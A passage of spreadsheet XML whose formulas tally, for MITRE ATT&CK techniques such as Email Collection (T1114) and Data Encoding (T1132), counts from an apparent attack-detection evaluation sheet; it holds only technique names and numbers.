        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B27,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>8</v>
      </c>
      <c r="BV27" s="292">
        <v>5</v>
      </c>
      <c r="BW27" s="322">
        <v>1</v>
      </c>
      <c r="BX27" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (5)</v>
      </c>
      <c r="BY27" s="12">
        <v>1</v>
      </c>
      <c r="BZ27" s="13">
        <v>1</v>
      </c>
      <c r="CA27" s="394">
        <v>1</v>
      </c>
      <c r="CB27" s="288">
        <v>10</v>
      </c>
      <c r="CC27" s="4">
        <v>2</v>
      </c>
      <c r="CD27" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (10)</v>
      </c>
      <c r="CE27" s="4">
        <v>1</v>
      </c>
      <c r="CF27" s="4">
        <v>1</v>
      </c>
      <c r="CG27" s="13">
        <v>1</v>
      </c>
      <c r="CH27" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:86" ht="15" customHeight="1">
      <c r="A28" s="4">
        <f t="shared" si="13"/>
        <v>26</v>
      </c>
      <c r="B28" s="4" t="str">
        <f>IFERROR(VLOOKUP(A28,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1114</v>
      </c>
      <c r="C28" s="493" t="str">
        <f>IFERROR(VLOOKUP(B28,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Email Collection</v>
      </c>
      <c r="D28" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B28)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E28" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F28" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G28" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>7</v>
      </c>
      <c r="H28" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5</v>
      </c>
      <c r="I28" s="322" t="str">
        <f t="shared" si="0"/>
        <v>5 (7)</v>
      </c>
      <c r="J28" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>5</v>
      </c>
      <c r="M28" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>19</v>
      </c>
      <c r="N28" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>4</v>
      </c>
      <c r="O28" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (19)</v>
      </c>
      <c r="P28" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>4</v>
      </c>
      <c r="S28" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>26</v>
      </c>
      <c r="T28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>9</v>
      </c>
      <c r="U28" s="4" t="str">
        <f t="shared" si="2"/>
        <v>9 (26)</v>
      </c>
      <c r="V28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>5</v>
      </c>
      <c r="Y28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>16</v>
      </c>
      <c r="Z28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>14</v>
      </c>
      <c r="AA28" s="322" t="str">
        <f t="shared" si="3"/>
        <v>14 (16)</v>
      </c>
      <c r="AB28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC28" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>9</v>
      </c>
      <c r="AE28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>39</v>
      </c>
      <c r="AF28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>22</v>
      </c>
      <c r="AG28" s="322" t="str">
        <f t="shared" si="4"/>
        <v>22 (39)</v>
      </c>
      <c r="AH28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>16</v>
      </c>
      <c r="AI28" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>7</v>
      </c>
      <c r="AK28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>55</v>
      </c>
      <c r="AL28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>36</v>
      </c>
      <c r="AM28" s="322" t="str">
        <f t="shared" si="5"/>
        <v>36 (55)</v>
      </c>
      <c r="AN28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>22</v>
      </c>
      <c r="AO28" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>9</v>
      </c>
      <c r="AQ28" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR28" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS28" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT28" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY28" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ28" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA28" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC28" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>26</v>
      </c>
      <c r="BD28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>9</v>
      </c>
      <c r="BE28" s="4" t="str">
        <f t="shared" si="8"/>
        <v>9 (26)</v>
      </c>
      <c r="BF28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>5</v>
      </c>
      <c r="BI28" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>12</v>
      </c>
      <c r="BJ28" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>6</v>
      </c>
      <c r="BK28" s="322" t="str">
        <f t="shared" si="9"/>
        <v>6 (12)</v>
      </c>
      <c r="BL28" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>4</v>
      </c>
      <c r="BO28" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>19</v>
      </c>
      <c r="BP28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>13</v>
      </c>
      <c r="BQ28" s="4" t="str">
        <f t="shared" si="10"/>
        <v>13 (19)</v>
      </c>
      <c r="BR28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS28" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT28" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU28" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B28,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>9</v>
      </c>
      <c r="BV28" s="292">
        <v>5</v>
      </c>
      <c r="BW28" s="322">
        <v>5</v>
      </c>
      <c r="BX28" s="4" t="str">
        <f t="shared" si="11"/>
        <v>5 (5)</v>
      </c>
      <c r="BY28" s="12">
        <v>3</v>
      </c>
      <c r="BZ28" s="13">
        <v>1</v>
      </c>
      <c r="CA28" s="394">
        <v>4</v>
      </c>
      <c r="CB28" s="288">
        <v>10</v>
      </c>
      <c r="CC28" s="4">
        <v>10</v>
      </c>
      <c r="CD28" s="4" t="str">
        <f t="shared" si="12"/>
        <v>10 (10)</v>
      </c>
      <c r="CE28" s="4">
        <v>3</v>
      </c>
      <c r="CF28" s="4">
        <v>4</v>
      </c>
      <c r="CG28" s="13">
        <v>1</v>
      </c>
      <c r="CH28" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="29" spans="1:86" ht="15" customHeight="1">
      <c r="A29" s="4">
        <f t="shared" si="13"/>
        <v>27</v>
      </c>
      <c r="B29" s="4" t="str">
        <f>IFERROR(VLOOKUP(A29,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1132</v>
      </c>
      <c r="C29" s="493" t="str">
        <f>IFERROR(VLOOKUP(B29,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Encoding</v>
      </c>
      <c r="D29" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B29)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E29" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F29" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G29" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H29" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I29" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J29" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M29" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>11</v>
      </c>
      <c r="N29" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>11</v>
      </c>
      <c r="O29" s="322" t="str">
        <f t="shared" si="1"/>
        <v>11 (11)</v>
      </c>
      <c r="P29" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>3</v>
      </c>
      <c r="Q29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>6</v>
      </c>
      <c r="S29" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>12</v>
      </c>
      <c r="T29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>12</v>
      </c>
      <c r="U29" s="4" t="str">
        <f t="shared" si="2"/>
        <v>12 (12)</v>
      </c>
      <c r="V29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>6</v>
      </c>
      <c r="Y29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>6</v>
      </c>
      <c r="Z29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>6</v>
      </c>
      <c r="AA29" s="322" t="str">
        <f t="shared" si="3"/>
        <v>6 (6)</v>
      </c>
      <c r="AB29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC29" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>6</v>
      </c>
      <c r="AE29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>20</v>
      </c>
      <c r="AF29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>18</v>
      </c>
      <c r="AG29" s="322" t="str">
        <f t="shared" si="4"/>
        <v>18 (20)</v>
      </c>
      <c r="AH29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>6</v>
      </c>
      <c r="AI29" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>6</v>
      </c>
      <c r="AK29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>26</v>
      </c>
      <c r="AL29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>24</v>
      </c>
      <c r="AM29" s="322" t="str">
        <f t="shared" si="5"/>
        <v>24 (26)</v>
      </c>
      <c r="AN29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>8</v>
      </c>
      <c r="AO29" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>6</v>
      </c>
      <c r="AQ29" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR29" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS29" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT29" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY29" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ29" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA29" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC29" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>12</v>
      </c>
      <c r="BD29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>12</v>
      </c>
      <c r="BE29" s="4" t="str">
        <f t="shared" si="8"/>
        <v>12 (12)</v>
      </c>
      <c r="BF29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>6</v>
      </c>
      <c r="BI29" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>2</v>
      </c>
      <c r="BJ29" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK29" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL29" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM29" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN29" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO29" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>10</v>
      </c>
      <c r="BP29" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B29,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>10</v>
      </c>
      <c r="BQ29" s="4" t="str">
        <f t="shared" si="10"/>
        <v>10 (10)</v>
